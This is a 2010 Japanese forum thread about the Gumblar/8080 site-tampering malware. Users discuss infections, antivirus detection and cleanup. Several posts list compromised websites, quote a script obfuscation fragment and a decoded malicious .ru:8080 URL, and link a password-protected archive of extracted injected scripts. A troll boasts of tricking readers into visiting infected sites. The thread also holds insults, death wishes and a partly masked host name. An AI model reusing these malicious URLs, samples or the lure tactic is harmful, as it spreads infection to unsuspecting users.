【Gumblar/GENO】Web改竄ウイルス総合スレ7【8080】at SEC
【Gumblar/GENO】Web改竄ウイルス総合スレ7【8080】 - 暇つぶし2ch321:('д') ◆yUyb3Tqn92
10/03/21 23:25:41
>>318
('д')は?
まだ誰も踏んでねーじゃまいか
ただ貼っただけで誰も踏んでないしふぁびょってないではないか
貼っただけでお前は本気で楽しかったと言っているわけじゃあるまいな

( ´,дゝ`)=3 お前もう不合格だお

322:名無しさん@お腹いっぱい。
10/03/21 23:27:46
>>321
すまなかった・・・
そういう意味か・・・

分からなかった俺が悪いな。
一人でやるよ。

アドバイス有り難う。
ブログは読み続けるよ・・・

323:('д') ◆yUyb3Tqn92
10/03/21 23:42:50
('Д')おうよ!!!!
('д')
'д')
д')
'д')
д')
')
)


三'д')ノシ

324:('д') ◆yUyb3Tqn92
10/03/22 00:07:10
Дブワハハハハハ!!
ガンブラー最高だわ!

今回は踏んだ奴にウィルスだとネタ晴らしせずに放置しまくったぞ
いつもならウィルスでしたー>w<駆除ガンバ!
って俺がネタ晴らしするか、誰かしらがウィルスだと踏んでから気づくんだが

ガンブラーは踏んでもそれがウィルスだと気づかない奴ばかりだお>w<どうなることやらw

325:名無しさん@お腹いっぱい。
10/03/22 00:16:13
genoの違約金っていくら払うの?商品を返品したいんだけど

326:名無しさん@お腹いっぱい。
10/03/22 00:19:44
>>325
板違い

327:名無しさん@お腹いっぱい。
10/03/22 03:25:21
8080系のオペラで踏んじゃったけどJRE入れて無かったら感染しない?

328:名無しさん@お腹いっぱい。
10/03/22 04:52:06
VB2010が何も反応しなかったけど、そういうウィルスなの?

329:名無しさん@お腹いっぱい。
10/03/22 04:53:56
url貼ってみ

330:名無しさん@お腹いっぱい。
10/03/22 04:56:46
↑のゴミコテが貼ったと思われるサイトです。

URLリンク(www.i-paradise5.jp)

331:名無しさん@お腹いっぱい。
10/03/22 05:54:50
      ζ
      / ̄ ̄ ̄ ̄\
     /         \
    /\    \  / |
    |||||||   (・)  (・) |
    (6-------◯⌒つ | < バカモ~ン! また直リンしおって!
    |    _||||||||| |
     \ / \_/ /
       \____/

332:名無しさん@お腹いっぱい。
10/03/22 05:59:50
>>330
8080系ウィルス感染済
ちなみにウィルスバスターは対応遅いからバスターだけ信用するのはどうかと思う
対策ソフトがウィルスとまで言われたウィルスセキュリティ0と比べたら遥かにマシだけど

333:名無しさん@お腹いっぱい。
10/03/22 06:05:28
>>331
申し訳ない

>>332
特にサイト運営やFTPソフト使ってないんで気にしてないんですが、
OS、ドライブフォーマットしないと駆除できませんかね?

334:名無しさん@お腹いっぱい。
10/03/22 06:07:07
>>330
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)

335:名無しさん@お腹いっぱい。
10/03/22 06:16:52
>>333
>>2-4の2を適用していれば無問題

336:名無しさん@お腹いっぱい。
10/03/22 06:25:41
>>335
わざわざすいません。
早速実施します。

337:名無しさん@お腹いっぱい。
10/03/22 06:48:16
>>336
いまからじゃ無駄
OS、ドライブフォーマットせい

338:('д') ◆yUyb3Tqn92
10/03/22 12:43:59
>>330>>336
('Д')ブウァハハッハハハッハハハハッハッハ!!!!!ザッマァアアア!!!!ヒャーッハー!
考えなしにウィルス踏むだけでも低脳なのに
俺に踏まされたことを俺が居るところで言ってるところがますます低脳だな>w<

そういう悔しそうな書き込みを見てしまうとますます俺様がヽ('Д')ノ 喜んでしまうではないか!!!!
しかもお前、挙句の果てにドライブフォーマットするしかないとまで言われちゃって・・・笑

('Д')ザッマァッァアァァアアみろ!死ねっ!!!お前のようなゴミはPCと一緒に焼却されてこいお(>w<)

おっとPCはリサイクルできるか
でもお前はもう焼却されて死ぬしかないべ?(>w<)そのくらい頭に血が上っているのでは~?W


339:('д') ◆yUyb3Tqn92
10/03/22 12:47:20
(*'д'*)あーウケタw
(*'д'*)まさか俺様にPC壊された低脳が来るとは・・・

・・・思ってたよ!!!!!(>w<)!!!!!

('д')今頃、せっかく休日なのに顔真っ赤にしてフォーマット作業してんだろな

340:('д') ◆yUyb3Tqn92
10/03/22 12:49:57
('д')そしてその間、俺様はというと
買い物行ったり、ゲームやったり、コーヒータイムを満喫したり、するわけだW


('`д´')な、わかったろ
正義は勝つということだよね。これが天才顔文字様とウィルスを踏んじゃう低脳どもの差なのだお。

341:('д') ◆yUyb3Tqn92
10/03/22 12:53:04
('д')ここでURL鑑定したり
URLまとめてる連中も同罪だな。
むしろ俺様がウィルス踏ませるのは良い事をしているがURLまとめてる奴は悪だぜ。

なぜならここで手に入れたURLを踏ませてる奴だっているわけだからな(>w<)

('д')え?どこって?さぁ~(笑)

そうだ、これ勇気スレにもマルチしとこっと

342:名無しさん@お腹いっぱい。
10/03/22 13:48:12
>>341
楽しいか?
よかったなカス


343:名無しさん@お腹いっぱい。
10/03/22 14:14:42
>341
pXXXX-XXXXXXXXhodogaya.kanagawa.ocn.ne.jp

344:名無しさん@お腹いっぱい。
10/03/22 14:17:18
>>343
341のIP?OCNだと困るな・・・

345:名無しさん@お腹いっぱい。
10/03/22 14:48:15
>>343
串だろそれ。

串は全規制されないかなぁ。
こんな基地外も串全規制すれば来ないんじゃね?

346:343
10/03/22 15:13:14
>>344-345
■network/ISP/OCN逆引きホスト地域割当表
URLリンク(wiki.tomocha.net)
>ipbf Bフレッツ
>神奈川県 hodogaya.kanagawa.ocn.ne.jp

pXXXX-ipbfXXXXhodogaya.kanagawa.ocn.ne.jp


<!-- ここにアフィ --!> とか・・・ワロタwww

347:名無しさん@お腹いっぱい。
10/03/22 17:41:59
なんかすげーのが沸いてる

348:名無しさん@お腹いっぱい。
10/03/22 17:56:48
ローカルあぼ~んも出来ないのかね、お前等

349:名無しさん@お腹いっぱい。
10/03/22 20:18:04
串サイトも危ないのかなあ

350:名無しさん@お腹いっぱい。
10/03/22 20:22:17
一般サイトも危ないのに串サイトなんて・・・

351:名無しさん@お腹いっぱい。
10/03/22 21:39:43
>>349
串使う事自体が頭おかしい

352:名無しさん@お腹いっぱい。
10/03/22 21:59:02
>>351
規制に巻き込まれた時にちょっと使うだけ・・・

353:名無しさん@お腹いっぱい。
10/03/22 22:26:30
>>352
代行レススレでいいじゃない
もしくは漫喫

354:名無しさん@お腹いっぱい。
10/03/22 23:19:12
●買えばいいよ

355:名無しさん@お腹いっぱい。
10/03/22 23:21:18
メモ用
URLリンク(www.jde-net.co.jp)
URLリンク(www.kikuyakikai.com)

356:名無しさん@お腹いっぱい。
10/03/22 23:33:19
ζ
      / ̄ ̄ ̄ ̄\
     /         \
    /\    \  / |
    |||||||   (・)  (・) |
    (6-------◯⌒つ | < バカモ~ン! また直リンしおって!
    |    _||||||||| |
     \ / \_/ /
       \____/

357:名無しさん@お腹いっぱい。
10/03/22 23:43:16
      ζ
      / ̄ ̄ ̄ ̄\
     /         \
    /\    \  / |
    |||||||   (・)  (・) |
    (6-------◯⌒つ | < バカモ~ン! わしのAAを壊しおって!
    |    _||||||||| |
     \ / \_/ /
       \____/


358:名無しさん@お腹いっぱい。
10/03/22 23:49:07
直リンしたのはあちこちでウィルス踏ませてる顔文字さんのためでもあるのです
誰かがウイルスに感染するのって面白いし人の不幸はおまんこの味がするしね
じゃんじゃん感染してけばいいとおもうにだ

359:名無しさん@お腹いっぱい。
10/03/23 03:56:30
>>341,358
URLリンク(ja.wikipedia.org)

マルウェアの作者と手を組んでやってるんじゃなくて
おまいらが陥落サイトのURLを貼って「勝手に手助け」してるだけだから

>共犯独立性説に立った場合には、実行従属性は不要となり、
>幇助行為が行われた時点で犯罪は完成する。

釣ったやつが感染して、情報流出等の被害が出た場合・・・
訴えられたら逮捕されるだろうねぇ。


360:名無しさん@お腹いっぱい。
10/03/23 06:12:27
>>359
↑踏んじゃった人必死だなー
いくらふぁびょっても誰も逮捕されないから
結局お前は泣き寝入りするしかないのであーるw

361:名無しさん@お腹いっぱい。
10/03/23 06:32:29
犯罪者の弁
「こんなことで捕まるとは思ってなかった」

362:名無しさん@お腹いっぱい。
10/03/23 09:26:14
こんなアホでも捕まってくれると良いけどね

363:名無しさん@お腹いっぱい。
10/03/23 10:06:39
>>339

お前、空しくならないか?

364:名無しさん@お腹いっぱい。
10/03/23 10:54:20
轢かれるとかで半身不随になってPCさわれなくなるのが望ましい。
もちろん貰いの貧乏事故で。

365:名無しさん@お腹いっぱい。
10/03/23 14:47:02
いまさらだが
>>263ってwindows7のultimateなのに、
DEP切って、applockerも使ってないの?
ultimateいらねぇじゃん
home にしてしまえw


366:名無しさん@お腹いっぱい。
10/03/23 15:12:28
Java Runtime Environment なんて>>3見て初めて知ったんですけど
これって皆さんやはりインストールしているのでしょうか・・・?
>>3の(1)~(3)までは実行してあったのですが もしかしたらこの状態だと覗いただけで感染してしまってたのでしょうか?


367:名無しさん@お腹いっぱい。
10/03/23 15:45:57
てんぷらよみなおせ

368:名無しさん@お腹いっぱい。
10/03/23 18:29:37
249-253まで凸完了


369:名無しさん@お腹いっぱい。
10/03/23 18:50:33
www●e-kudamono●co●jp/
googlでは引っかからないけどaguseではTrojan-Clicker.JS.Agent.mz


370:名無しさん@お腹いっぱい。
10/03/23 19:03:33
>>369
>>252

371:名無しさん@お腹いっぱい。
10/03/23 19:22:47
ウイルス作成は儲かるとか、ガンブラーを作ったチームは、一人一千万貰ったとかですが
それでも、一年に一回か二回は仕事をする必要があるんじゃないのかなー、と思うのです。

去年は、3月、10月、12月かな?
感染者がゼロからのスタートでご存知の通りの事態です。

次回は、残存感染サイト数、残存感染PC数から
更に鼠算式に拡大するのでしょうか。
ウイルスも差し替えられるのでしょうか。

出来れば、残存感染サイト数、残存感染PC数をゼロに近づけたいのですが
いろいろと限界があるのです。。。


372:名無しさん@お腹いっぱい。
10/03/23 19:29:50
文章書いてみたけど、書くことは何も無かった
って感じですね

373:名無しさん@お腹いっぱい。
10/03/23 19:58:47
勘違いもひどいし何が言いたいのか分からない
すごい文章だ

374:名無しさん@お腹いっぱい。
10/03/23 20:16:39
このスレも荒れてきたな・・・

所でこれもガンブラーだよな?
eroquis●s1●freexy●net/

375:名無しさん@お腹いっぱい。
10/03/23 20:20:32
>>374
お前眼科行ったほういいよ

376:名無しさん@お腹いっぱい。
10/03/23 20:30:34
>>375
URLリンク(safebrowsing.clients.google.com)


377:名無しさん@お腹いっぱい。
10/03/23 22:37:49
>>376
ソースも確認出来ないチキンなの?

378:名無しさん@お腹いっぱい。
10/03/23 22:53:36
aisyw●com

379:名無しさん@お腹いっぱい。
10/03/23 22:57:33
>>377
>ただいま移転作業中につき閉鎖しています
>近日中にこのページも削除されますので、ご了承下さい
んで>>367

>>377
今は、改竄に気が付いて対応した後でコードはないが
>>347が発見した時にコードは有ったのかも知れない
>>367からもにコードは有ったのは確か

目で見える物の背後にある、目では見えない真実を読む事も大切なのじゃw

380:名無しさん@お腹いっぱい。
10/03/24 00:56:39
> 目で見える物の背後にある、目では見えない真実を読む事も大切なのじゃw

>>367」をいちいち「>>376」と読み替えなきゃならないのもやっぱその類ですか?

381:名無しさん@お腹いっぱい。
10/03/24 01:45:59
>374
っていうか俺そのサイトよく訪れてたんですけど・・・
仮にgumblarに感染しているサイト訪れてたとしたら、自分がgumblarを伝染する事もありえるのでしょうか?
その場合感染しているかどうか調べる方法はないのでしょうか?心配になってきた・・

382:名無しさん@お腹いっぱい。
10/03/24 07:15:07
>>381
サイトが改ざんされた=Gumblar系列のウィルスを呼び出すスクリプトが埋め込まれた
とは限らないよ。

サイトの管理人もなにが置いてあったのか把握してないみたいだし
PCキレイにしたのかどうかもブログの文章からは判断できない。
特定するのは難しいんじゃない?

>感染しているサイト訪れてたとしたら、自分がgumblarを伝染する事も
使ってるPCに脆弱性が残ってるなら感染するだろうね

「ガンブラー」「サイト改ざん」めぐる基本のQ&A ~ 何が起きている? 対策は?
URLリンク(www.so-net.ne.jp)

383:名無しさん@お腹いっぱい。
10/03/24 15:38:02
とうとう警視庁が動き出したようだな
むしろ遅すぎたが

384:名無しさん@お腹いっぱい。
10/03/24 15:58:49
ガンブラー問題でフランスなどに国際捜査協力を要請 海外5カ国のサーバ悪用 警視庁 [03/23]
スレリンク(liveplus板)

【ネット】警視庁がガンブラー問題でフランスなどに国際捜査協力を要請 海外5カ国のサーバ悪用
スレリンク(newsplus板)

385:名無しさん@お腹いっぱい。
10/03/24 16:20:08
とりあえずWindowsやアドビとかの脆弱性を全部埋めてセキュリティソフトを常に最新に保ち
常駐ソフト以外にもスパイボットとか入れてruとかのドメイン全部弾いて
Webブラウザ等を仮想化する

こんなもん?
出来ればCドライブ自体仮想化してしまえば何の心配もないんだろうけどな

386:名無しさん@お腹いっぱい。
10/03/25 00:47:12
スレチすまん。
ガンブラー系ではないかもしれないが、「igqjj.exe」ってのにやられてしまい今駆除中。
ググッても英文のサイトしか無く、情報少。誰か駆除できた方いませんか?

その英文のサイトにあった「Superなんとか」って言うソフトで駆除しているけど、どこを見てもそのソフトしか出てこない。
新種なのか?

で、感染源はどうやら「チュートリアルDVDの断片」らしい。英語で解説している(DL物)物だが、「まあ雰囲気で解るだろう」と
空けたのが間違いでそれに仕掛けてあったのか、乗ってきたのか定かではない。が、そのDL物ファイルを開けただけでは
見られないもので、アドレスやら何やら登録しないと始まらない仕様。

適当に架空の個人情報を入力し「サブミット」。たしかに映像は始まったが15分もしないうちにPCの挙動がおかしくなり
CORE2 が「フリーズ」。初めてフリーズしたところを このマシンでみた。 うかつだった。

情報ありましたら、よろしくお願いします。重ねてスレチ、すみません。

387:名無しさん@お腹いっぱい。
10/03/25 01:09:04
こっちいk

【ウィルス情報質問 総合スレッド★Part47】@セキュリティ
スレリンク(sec板)l50


388:名無しさん@お腹いっぱい。
10/03/25 01:14:54
>>386
スレチだと思うなら該当スレ探せよ
セキュ板に辿りつけたならわかるだろ

そもそも後半は何言ってるかわからん

389:名無しさん@お腹いっぱい。
10/03/25 09:29:09
>DL物ファイルを開けただけでは見られないもので、アドレスやら何やら登録しないと始まらない
例の暴露ウィルスと似てるなw



390:名無しさん@お腹いっぱい。
10/03/25 12:24:57
ホームページもってないひとは感染しても気がつきにくいかもな

391:名無しさん@お腹いっぱい。
10/03/25 16:13:12
>>390
そうそう
っていうか現時点での確認方法は各アンチウイルスソフトによるスキャンしかないのかな?
検出しない所が多いみたいだけどさ

392:名無しさん@お腹いっぱい。
10/03/25 19:06:01
感染したら色々ぶち込まれるみたいだから大元の本体は無理でも何かしら拾えないのか?>スキャン

393:名無しさん@お腹いっぱい。
10/03/25 19:13:51
偽セキュリティソフトが落とされたりすれば嫌でもわかるな

394:名無しさん@お腹いっぱい。
10/03/25 20:31:30
音素材サイト『ザ・マッチメイカァズ』がウイルス感染で閉鎖の危機
スレリンク(news板)

395:あんちたった
10/03/25 20:57:23
>>394
マジかよ・・・

396:名無しさん@お腹いっぱい。
10/03/25 21:05:14
>>394
ちょww
マジで?

397:名無しさん@お腹いっぱい。
10/03/25 21:51:54
www●doomkeikaku●co●jp
株式会社レジナのホスティングが多すぎ

398:名無しさん@お腹いっぱい。
10/03/25 22:30:58
/.sys/?action=
っつーコードが複数サイトでインジェクションされてるってとあるサイトで見たんだが
どういうこったい

399:名無しさん@お腹いっぱい。
10/03/26 01:04:38
8080は強姦してくれるからわかりやすい
xは気がつかない人は一生気がつかないかも

400:名無しさん@お腹いっぱい。
10/03/26 02:36:33
8080はxmlrpc.phpにもつくのか…

401:コテハン
10/03/26 11:10:57
【陥落サイトのURL悪用厳禁】
www●net-fukui●jp
www●doomkeikaku●co●jp/
seo●19th●org/
www●commentsexy●com/ ←ハニートラップwww

現在の最新型は
("repl"+"XXXace".substr(Y))
これが含んでるっぽい

402:名無しさん@お腹いっぱい。
10/03/26 13:22:57
>>401
1番目と3番目の文法ミスってどうしておこるの?

403:コテハン
10/03/26 14:02:34
>>402
作者に聞いてみないとわからないのでござる

404:名無しさん@お腹いっぱい。
10/03/26 14:05:52
>>401
上から順番に挿入部分だけ切り取ったスキャン結果どえ~す
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
Avastが4/4
AVGが2/4
McAfeeが3/4
TrendMicro4/4
カスペルはVerの都合でヒューリスティック表記出ず
ノートンはドライブバイダウンロード阻止
いずれも4/4
こんなとこですかね~

405:404
10/03/26 14:20:34
URLリンク(www1.axfc.net)
一応4ファイル入りです
パスnews

406:コテハン
10/03/26 17:31:06
【陥落サイトのURL悪用厳禁】
www●sankiblast●co●jp/ ←新型きたー

現在、発掘作業中・・・

407:コテハン
10/03/26 17:55:05
【陥落サイトのURL悪用厳禁】
www●coaster-ya●com/
www●soul-wave●jp/MAME/
j-news●net/
discussanctuary●com/main●php ←!

www●daini-survey●com/
www●daini-survey●com/xmlrpc●php ←!

harappa-h●org/
harappa-h●org/AtoZ/modules/popnupblog/rss●php ←!

ががが・・・

408:U.F.O ◆U.F.OnbYNA
10/03/26 18:20:00
>>407
これも新種なの・・・か?

jニュースが・・・

409:コテハン
10/03/26 18:22:47
net-fukuiとdoomkeikaku
逃げるの早すぎてワロタwww

410:コテハン
10/03/26 18:33:05
>>408
「ただいま絶賛更新中」みたい

あとは・・・
URLリンク(search.yahoo.co.jp)
検索結果を見てくれ

411:U.F.O ◆U.F.OnbYNA
10/03/26 18:37:49
>>410
よく覗いてたあのサイトも感染ったとは・・・

そのタグが新種か・・・
あとphpが多いけどドメイン範囲でphp感染してる?

412:名無しさん@お腹いっぱい。
10/03/26 18:45:10
最悪だな…もうどうにもならないんだね
1年も終息に向かわないなんて…
本当にこれの犯人は死刑では済まされないな
一日でも捕まる事を祈るしかないか…
ここまで新種が出たりして
ロシアンルーレット状態のネットなんかやりたくないよ…もう嫌だ

413:名無しさん@お腹いっぱい。
10/03/26 18:58:56
これじゃちょんぎって聖職者になるしかない

414:コテハン
10/03/26 20:26:02
【陥落サイトのURL悪用厳禁】
j-news●net/だが・・・
include/external●js
/include/xoops●js
この2つもやられてた。

あと、デコード後のURLは
news-com-au●priceminister●com●timesonline-co-uk●TheSuperPager●ru:
8080
/5d6d●com/5d6d●com/rian●ru/homeway●com●cn/google●com●php
これで良いのかな?


>>411 陥落サイト=感染したPCの中の情報次第。


415:名無しさん@お腹いっぱい。
10/03/26 20:47:53
>>404
Avira&MSE使えねー

416:名無しさん@お腹いっぱい。
10/03/26 21:01:07
AVGにしていて良かったと思ったら感染しそうで怖い。
ってかスペインかどっかで捕まったウィルス作成グループは
どうなったの?

417:名無しさん@お腹いっぱい。
10/03/26 21:04:43
Aviraは現物対応だからスクリプトでは無理。

418:名無しさん@お腹いっぱい。
10/03/26 21:16:00
なんだかんだで ru:8080/ もしくは :8080/ をURLブロックするのが一番楽?

419:名無しさん@お腹いっぱい。
10/03/26 22:02:33
:8080ごとブロックはやめとけ

420:名無しさん@お腹いっぱい。
10/03/26 22:06:03
>>416
あれは作者じゃなくてそれを買ってるユーザーだったような

421:名無しさん@お腹いっぱい。
10/03/26 22:09:29
>>420
そうなんだ。まぁ、ユーザー捕まえるのだけでも
意味あるかもね

422:名無しさん@お腹いっぱい。
10/03/26 22:26:11
>>415,417

ん?
JS/Redirector.KA KA.1 KA.2 KA.3
として検出されてますが?

423:名無しさん@お腹いっぱい。
10/03/26 22:39:05
virustotalで検出できない判定食らわされたからって現物のソフトが絶対検出できないって訳じゃない
virustotalでの検出可否は参考程度と思っといた方が良い

でも安心しちゃダメよ

424:名無しさん@お腹いっぱい。
10/03/26 23:10:13
.ruドメインの登録手続きが厳格化されるみたいだけど
そうなると.ru:8080が通用しなくなるのかな?
4月1日からだって

ロシアの「.ru」ドメインの登録手続きが厳格化へ―サイバー犯罪の防止がねらい
URLリンク(www.computerworld.jp)

425:名無しさん@お腹いっぱい。
10/03/26 23:16:20
.cn、.ruの次はどこが標的にされるでしょうね?

426:名無しさん@お腹いっぱい。
10/03/26 23:31:40
まさかの.jp

427:名無しさん@お腹いっぱい。
10/03/26 23:32:30
本家のlv(ラトビア)じゃないか?

428:名無しさん@お腹いっぱい。
10/03/27 00:09:53
>>427
なぜラトビアが本家?

429:名無しさん@お腹いっぱい。
10/03/27 01:03:08
>>414
URLリンク(www.virustotal.com)
結果: 1/42 (2.39%)
Jiangmin:Trojan/JS.Pegel.a

430:名無しさん@お腹いっぱい。
10/03/27 02:09:44
Jnewsって編集長がtwitterやってなかったか?

431:コテハン
10/03/27 18:35:26
【陥落サイトのURLは悪用厳禁】
※他スレへの転載は自己責任で行って下さい。
www●okagrate●com/
www●tirashi●jp/
www●e-proactive●com●hk/
relaxsize●com/

■センセイは最新型を絶賛スルー中
URLリンク(www.google.co.jp)



432:名無しさん@お腹いっぱい。
10/03/27 19:13:14
>>431
3~4連発入ってるやつがいるな
どうやったらこんな連発になるんだか

433:名無しさん@お腹いっぱい。
10/03/27 21:51:35
最近avastスレにここに報告されたアドレスが有用情報として貼られてます。しかもウイルス警告を否定する周到さ
既に2件確認済み

434:名無しさん@お腹いっぱい。
10/03/27 22:55:52
だからどうしろと

"今のところ"は対策しとけば感染はしない。セキュ板覗くような人は当然ながらやってるだろ
アドレス貼って楽しんでるようなアホは相手にしたら余計に貼るよ

435:名無しさん@お腹いっぱい。
10/03/27 23:03:25
安易にクリックしちゃうという行動もいかがなものかと思われるし
そういう人は痛い目見て学習したほうがいいんじゃないの

ウイルスサイト貼りを肯定はしないけどさ

436:名無しさん@お腹いっぱい。
10/03/27 23:23:39
2ch内のURLを安易にクリックするなってのはセキュ板じゃなくても基本だろ
基本を忘れちゃいかんよ

437:('д') ◆yUyb3Tqn92
10/03/28 04:48:29
('`д´')うむ、だからこそ俺様がウィルスURLを踏ませていることはエロイこと!
じゃなくて偉いこと!俺様にウィルス踏まされた馬鹿は
その経験のおかげでネット上で簡単にURLを踏む事の危険性に気づくってわけだ!
('д')┌ まぁ本当の馬鹿は何回も引っかかるけどな。

つまり
('`д´')俺様は反面教師、いや、必要悪を買って出てるってわけさ!
そして、それが俺様の人気の秘訣でもあるわけだ('д^)-☆ いつもブログに応援ありがとうねみんな!


438:名無しさん@お腹いっぱい。
10/03/28 06:37:53
禿の相手はしないように
これ基本な

439:名無しさん@お腹いっぱい。
10/03/28 12:36:34
新潟ライブカメラ でなんかでた。

440:名無しさん@お腹いっぱい。
10/03/28 14:02:38
ここって個人ブログ晒して平気?さっきとあるブログ見てたらガンブラーって言うウィルスをブロックしたってノートン先生が教えてくれた。
だけどガンブラーをチェックするサイトでチェックしても出てこない。自分のPCが悪いの?

441:名無しさん@お腹いっぱい。
10/03/28 14:29:04
直接コード見て確認してからはるもんだろJK

442:名無しさん@お腹いっぱい。
10/03/28 14:30:40
>>440
どのチェックサイトを使ったんだよ

443:名無しさん@お腹いっぱい。
10/03/28 14:36:36
>>442
>>5のチェックサイト全部。
8080って奴だと思う。


444:名無しさん@お腹いっぱい。
10/03/28 18:22:14
それならソースも見たってことだろ
それでないなら無いんじゃないの

445:名無しさん@お腹いっぱい。
10/03/28 19:15:05
ノートンは何を見たんだ

446:名無しさん@お腹いっぱい。
10/03/28 19:52:36
ノートンは誤検出するほど優秀でウイルスバスターは誤検出するザル

447:名無しさん@お腹いっぱい。
10/03/28 20:08:55
更に、ソースネクストはウイルスバスター以下。

448:名無しさん@お腹いっぱい。
10/03/28 21:02:19
>>446-447
URLリンク(all-freesoft.net)
■AV-Comparativesによるランク
★★★ G DATA・AVIRA・TrsutPort・PC Tools・Symantec・F-Secure・ESET
    BitDefender・eScan・Avast・Kaspersky
★★  McAfee・Panda・Microsoft・Sophos・AVG
★   K7
ゼロ  Norman・Trend Micro・Kingsoft

バスターとKingは(以下略

449:名無しさん@お腹いっぱい。
10/03/28 21:07:37
>>448
誤検知を考えてもK7の方が上という罠

450:名無しさん@お腹いっぱい。
10/03/29 00:19:02
※ESETの防御率が4%しかない点を指摘された際の反論で、
ESET信者がセキュリティ板中に、VB100・AV-Comparatives・AV-Test.org等の
テスト結果コピペしていたのがバレてしまった瞬間。
スレリンク(sec板:47-49番)

451:名無しさん@お腹いっぱい。
10/03/29 00:31:07
>>450
4%ってPFWのことだろ?
URLリンク(www.matousec.com)
1本でおkの統合型はザルが多いからなw

452:名無しさん@お腹いっぱい。
10/03/29 00:46:21
ファイアウォールじゃなくてHIPSのテストだろ
いい加減気づけよ

453:名無しさん@お腹いっぱい。
10/03/29 00:55:14
   (・∀・ )∀・ )
   と_,、⌒) )⌒) )  HIPSでーすイエーイ
     (_ ノノ_ ノノ

454:名無しさん@お腹いっぱい。
10/03/29 04:57:00
このウィルス踏んじゃったときすぐリカバリしたのに
俺のサイトが改ざんされてた。どゆこと?

455:名無しさん@お腹いっぱい。
10/03/29 05:02:02
踏んだ時にサイトのログインパスを抜かれたから要パス変更

456:名無しさん@お腹いっぱい。
10/03/29 06:27:40

URLリンク(www.jnews.com)
URLリンク(relaxsize.com)

この二つはもうウィルスじゃなくね?
え?直リンするよ?文句ある?じゃ死ねば?

457:名無しさん@お腹いっぱい。
10/03/29 08:04:10
オートコンプリート切ったらコンプリートされなくなったのでハゲです

458:名無しさん@お腹いっぱい。
10/03/29 08:27:19
>>456
jnewsは直ってる
relaxsizeはまだ感染中

459:名無しさん@お腹いっぱい。
10/03/29 08:45:03
感染してないよ

460:名無しさん@お腹いっぱい。
10/03/29 09:20:32
>>460
今見たら直ってるな
キャッシュの罠か?

461:コテハン
10/03/29 09:35:08
>>456
jnews.com/ぢゃなくてj-news.net/(苦笑)
で、そのj-news.net/から告知が出てた
URLリンク(www.j-news.net)


462:名無しさん@お腹いっぱい。
10/03/29 10:08:58
IEのアドオンでShockwaveとAdobePDFLinkHelperは無効にしたほうがいいの?

463:名無しさん@お腹いっぱい。
10/03/29 14:34:17
根本がわかってないやつはなにやってもムダ

464:名無しさん@お腹いっぱい。
10/03/29 22:20:25
>>462
分からなかったらとりあえずアンインスコしとけ
どうせ使わんだろその辺

465:名無しさん@お腹いっぱい。
10/03/30 02:43:58
>>461
>つきましては、以下ウィルスの内容や対処方法などを記述します。

ヲイヲイ、バスターで駆除して終わりかよ。
それで済むんなら、サイト閉鎖する必要無いだろうが

466:名無しさん@お腹いっぱい。
10/03/30 03:01:43
>>465
だな。 告知してるだけ「マシ」ってとこかな?

■サイト改ざん猛威:感染パソコンの修復は「OSの再インストール」が近道
URLリンク(www.so-net.ne.jp)
>8080のの攻撃では
~~中略~~
感染パソコンを感染前の状態に戻すのは、ほとんど絶望的と考えるのが賢明だ。
感染が確認された場合には、必要なデータをバックアップし、
OSを再インストールするのが確実な方法といえるだろう。

これを貼れば良いのに・・・

467:名無しさん@お腹いっぱい。
10/03/30 11:33:14
>>466
貼ったら貼ったで今度は一般人から非難続出だろうね。

468:名無しさん@お腹いっぱい。
10/03/30 20:04:00
今となってはアップデートすらしない自分の方が過失の度合いは大きいけどね。

469:名無しさん@お腹いっぱい。
10/03/30 22:02:05
216>>
mozilla add-ons の epdfを使っています。軽い。

470:名無しさん@お腹いっぱい。
10/03/30 22:54:38
>>469
アンカーくらいちゃんと打ってください><

471:名無しさん@お腹いっぱい。
10/03/31 00:30:59
470>>
は?なにいってんの
ちゃんとアンカされてるだろ

472:名無しさん@お腹いっぱい。
10/03/31 00:35:04
特定の専ブラだと安価になるのかね

473:名無しさん@お腹いっぱい。
10/03/31 00:51:54
その専ブラを知りたいね

474:名無しさん@お腹いっぱい。
10/03/31 01:43:37
Janeなら
数字を左クリックで選択反転させ、右クリックすると安価先がPOPされる

安価の>や<はもともとああいう使い方もしたようだが
ここは2chなので

475:名無しさん@お腹いっぱい。
10/03/31 01:48:21
こんな子供だましなウィルスに感染する奴って馬鹿なの?死ぬの?

476:名無しさん@お腹いっぱい。
10/03/31 01:51:51
>>474
> 数字を左クリックで選択反転させ ×
数字を左ダブルクリックで選択反転させ ○



477:名無しさん@お腹いっぱい。
10/03/31 04:12:57
今日JREの更新くるんだっけ

478:名無しさん@お腹いっぱい。
10/03/31 04:16:47
もうきてる
ついでにIE8のセキュパッチもきてるぞ

479:名無しさん@お腹いっぱい。
10/03/31 09:10:03
おい、こいつなんとかしてくれ

連日,相当 多数の皆さんが このページの駆除方法で
最低最悪のsecurity toolを駆除され,
再び 元通りにパソコンを使用出来たにも関わらず
ほとんどの皆さんから 何の喜びのメッセージをいただけません。
日本人の大人が,これほど礼儀知らずであったのでしょうか。
困っている場合に 手助けされる時,
お礼を言い合う習慣はなくなったのでしょうか。
                私は 因みに 現在 64歳です。

URLリンク(8.pro.tok2.com)


480:名無しさん@お腹いっぱい。
10/03/31 09:19:07
>479
前スレで出てたやつか
メールフォームから凸した人がいるが無視されてる

消去方法を削除してて、2000円払ったら教えるって書いてた時期もあった
間違いなく何言っても無駄だと思う

481:名無しさん@お腹いっぱい。
10/03/31 09:34:58
古いかもしれないが、ねっとなんて、昔はサービスの塊のようなものでやっていたもの
だと思うがな

482:名無しさん@お腹いっぱい。
10/03/31 10:29:57
金欲しいんだったら情報商材なんだからオークションで売れよw

483:名無しさん@お腹いっぱい。
10/03/31 10:35:53
なんの反応もないのに、なんで駆除できたと分かるんだ?

484:名無しさん@お腹いっぱい。
10/03/31 10:37:16
>>479
どんだけ上から目線なんだよwww


485:名無しさん@お腹いっぱい。
10/03/31 10:40:19
>>479
ここって感染サイトだったの?

486:名無しさん@お腹いっぱい。
10/03/31 11:20:58
>>479
今イロイロ見てたら、このおじちゃん他人のブログやらOKやらで自分の駆除方法書きまくりじゃん。


487:名無しさん@お腹いっぱい。
10/03/31 11:23:01
そのうちここにも書いてきたりしてなw

488:名無しさん@お腹いっぱい。
10/03/31 11:24:53
人に礼を求める奴にろくなのはいない

489:名無しさん@お腹いっぱい。
10/03/31 11:44:24
私 金澤は 入会した翌日に 2円をゲットしました。
ささやかなお小遣いを希望される方に お奨めします。

